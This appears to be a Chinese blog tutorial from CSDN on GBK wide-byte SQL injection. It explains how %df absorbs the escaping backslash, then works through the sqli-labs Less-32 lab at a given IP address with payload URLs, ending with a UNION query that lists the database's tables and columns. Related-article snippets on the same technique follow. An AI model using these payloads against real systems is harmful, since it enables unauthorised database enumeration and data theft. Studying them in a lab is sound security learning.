sql注入之宽字节注入

最新推荐文章于 2024-06-25 18:15:00 发布
最新推荐文章于 2024-06-25 18:15:00 发布
阅读量317 收藏
点赞数 1
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A1956936030/article/details/108873569
版权

一.宽字节注入

宽字节注入原理:

GBK 占用两字节,ASCII占用一字节

PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。

大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是说:%df\’ = %df%5c%27’,有了单引号就好注入了。

宽字节注入实例:

(1).题目 http://117.167.136.242:8002/Less-32/

在这里插入图片描述
(2).?id=1
看到编码变化了
所以是宽字节注入

http://117.167.136.242:8002/Less-32/?id=1

在这里插入图片描述

(3).所以我们要用%df来代替一个字节

http://117.167.136.242:8002/Less-32/?id=1%df

在这里插入图片描述

页面正确
(4).加个单引号页面报错

http://117.167.136.242:8002/Less-32/?id=1%df’

在这里插入图片描述

页面报错
存在注入

(5).给出一个payload

http://117.167.136.242:8002/Less-32/?id=-1%df%27union%20select%201,2,3--+

在这里插入图片描述
(6).查表名,以及表中的字段。

http://117.167.136.242:8002/Less-32/?id=-1%df%27%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database())%20--+

在这里插入图片描述

哇哇**
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL宽字节注入
qq_64332865的博客
02-19 3352
宽字节注入适用于cms和数据库对字符串的编码方式不统一、WAF利用 AddSlashes()等函数对敏感字符进行转义的场景。 统一的国际规范的理想状态是所有应用程序都使用Unicode编码,所有的网站 都使用UTF-8编码。但因为一些历史原因,国内及国外(特别是非英语国家)的一些cms仍然使用着自己国家的一套编码(如GBK);也有一些cms为了考 虑老用户,出了GBK和 UTF-8两个版本。 一个GBK编码汉字,占用2个字节;一个UTF-8编码的汉字,占用3-4个字节。当Web应用程序的编码方式为GBK,而
宽字节注入实例
七月_的博客
08-09 2100
http://103.238.227.13:10083/?id=1 我们看一下html源码 看到编码变化了 所以是宽字节注入   所以我们要用%df来代替一个字节 http://103.238.227.13:10083/?id=1%df   页面正确 加个单引号页面报错 http://103.238.227.13:10083/?id=1%df’ 页面报错 存在注入  ...
浅析常见WEB安全漏洞及其防御措施_web漏洞防护
最新发布
Z4400840的博客
06-25 905
在网络攻防中,Web系统通常是攻击者的首选目标,攻击者大都通过Web打点的方式,先拿到边界Web服务器的权限,再以此为跳板实施内网横向渗透。由于Web系统通常涉及大量的用户数据和敏感信息,一旦受到攻击或破坏,可能造成数据泄露、服务中断等影响。相较于攻击方,Web系统也是防守方的重点防护对象。作为安全开发或安全运营人员,及早发现和修复潜在的WEB安全漏洞,不仅有助于提高互联网业务系统的稳定性,也能降低后期安全运营工作的压力和成本。【一一帮助安全学习,所有资源获取处一一】①网络安全学习路线。
宽字节注入
03-23 239
0x0 背景 当某字符的大小为一个字节时,称其字符为窄字节. 当某字符的大小为两个字节时,称其字符字节. 所有英文默认占一个字节,汉字占两个字节 常见的字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等 0x1 宽字节注入原理 程序员为了防止sql注入,对用户输入中的单引号(’)进行处理,在单引号前加上斜杠(\)进行转义...
SQL注入-09】宽字节注入案例—以sqli-labs-less32为例
m0_64378913的博客
05-01 2510
符号 GBK编码 ’ 27
第十九节 字节SQL注入-01
09-15
宽字节注入代码分析 在字节SQL注入攻击中,攻击者可以使用 Php 的addslashes 函数来转义特殊字符,例如将“'”转义为“%DF\'”。然后,在MYSQL中,这个字符将被认为是一个合法的字符,从而 bypass 数据库的安全...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL...
超级SQL注入工具使用说明书V1.1 20190303.docx
05-03
总的来说,超级SQL注入工具以其高效、全面的特性,为安全测试人员和信息安全工程师提供了强大的SQL注入检测和利用能力。它不仅可以帮助测试人员快速发现和理解注入漏洞,还能通过详尽的发包记录辅助学习和解决问题。...
SQL注入攻击及其预防方法研究
07-05
SQL注入攻击是一种网络攻击技术,攻击者通过在Web表单输入或URL查询字符串中插入恶意SQL代码片段,试图操纵后端数据库执行非法的数据库操作。这种攻击方式可以用来窃取数据、修改数据库中的数据、执行管理操作(比如...
SQL注入攻击与防御
03-12
5. **宽字节注入**:利用多字节字符集编码特点来绕过输入过滤。 #### 三、SQL注入实例 为了更好地理解SQL注入的工作原理,下面通过一个简单的例子来进行说明: 假设有一个登录页面,其用户名验证部分的SQL语句...
sql宽字节注入
qq_63157899的博客
04-07 4706
sql注入中最关键的一步就是将引号进行闭合,而常见的addslashes()函数、mysql_escape_string函数、get_magic_quotes_gpc()函数、mysql_real_escape_string()函数的使用将引号进行了转义,这时我们要绕过这些函数进行注入宽字节注入就是其中一种方法。 何时能进行宽字节注入 1.mysql数据库使用GBK编码 2.对引号进行了转义(加\) 特殊情况: 1.数据库使用了安全的编码模式 2.使用了iconv() 函数进行一些特殊
SQL注入宽字节注入
qq_68233961的博客
07-24 1926
SQL注入宽字节注入
sql注入——宽字节注入
cxrpty的博客
02-11 353
宽字节注入利用MySQL的一个特性,MySQL在使用GBK编码时,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围) 在sql注入时,addslashes()函数会把你输入的sql语句中的单引号(’),双引号(")等特殊字符转义掉,使之变成字符串,这个时候就需要用到宽字节注入。 以sql labs32为例 1.在sql labs32中输入http://localho...
mysql sql宽字节注入_sql注入宽字节注入
weixin_39553705的博客
01-18 109
宽字节注入是因为数据库使用了GBK编码,不过现在大都使用unicode国际编码,大多数网站都使用了utf-8的编码不过既然是sql注入的一部分,也搭建环境 做做实验实验环境:wamp集成包实验说明:创建使用GBK编码的数据库实验步骤:使用phpmyadmin进行创建数据库的时候,如果不去选择编码格式,默认会使用latin1_swedish_ci 格式查了一下 ,和GBK类似,那就这个吧。。。使用...
sql注入宽字节注入(墨者学院)
qq_42383069的博客
05-03 703
sql注入宽字节注入 1.原理:当php开启魔术函数–magic_quotes_gpc函数时,单引号(’)  双引号(")  反斜线() 等字符都会加上反斜线。 eg:我们在id=1后面加上’ 会被自动转义为 /’ 所以导致我们输入的东西无法闭合,就不会当做代码执行,就无法产生SQL注入了。 2.绕过原理: (1)1,a,’ 均为一个字节 (2)汉字 均为三个字节 (3)希腊...
SQL Injection6(宽字节注入)
kid的博客
05-08 852
SQL Injection6(宽字节注入) 前言 前面sql注入时最怕碰到的就是字符注入,然后’被过滤,反正当时时没有什么办法解决,但宽字节注入给这样的情况带来了希望 宽字节注入原理 首先是编码,之所以产生宽字节注入,就是因为有不同的编码方式 因为php后端会对我们的输入进行转义,转义的方式通常是加上’\’, 比如 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串(预定义字符...
SQL 注入宽字节注入原理
06-09
宽字节注入是一种常见的 SQL 注入技术,它利用了一些编码方式对非 ASCII 字符进行编码的特点,从而绕过某些安全机制,达到执行恶意 SQL 语句的目的。 宽字节注入原理是将非 ASCII 字符编码为多个 ASCII 字符,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值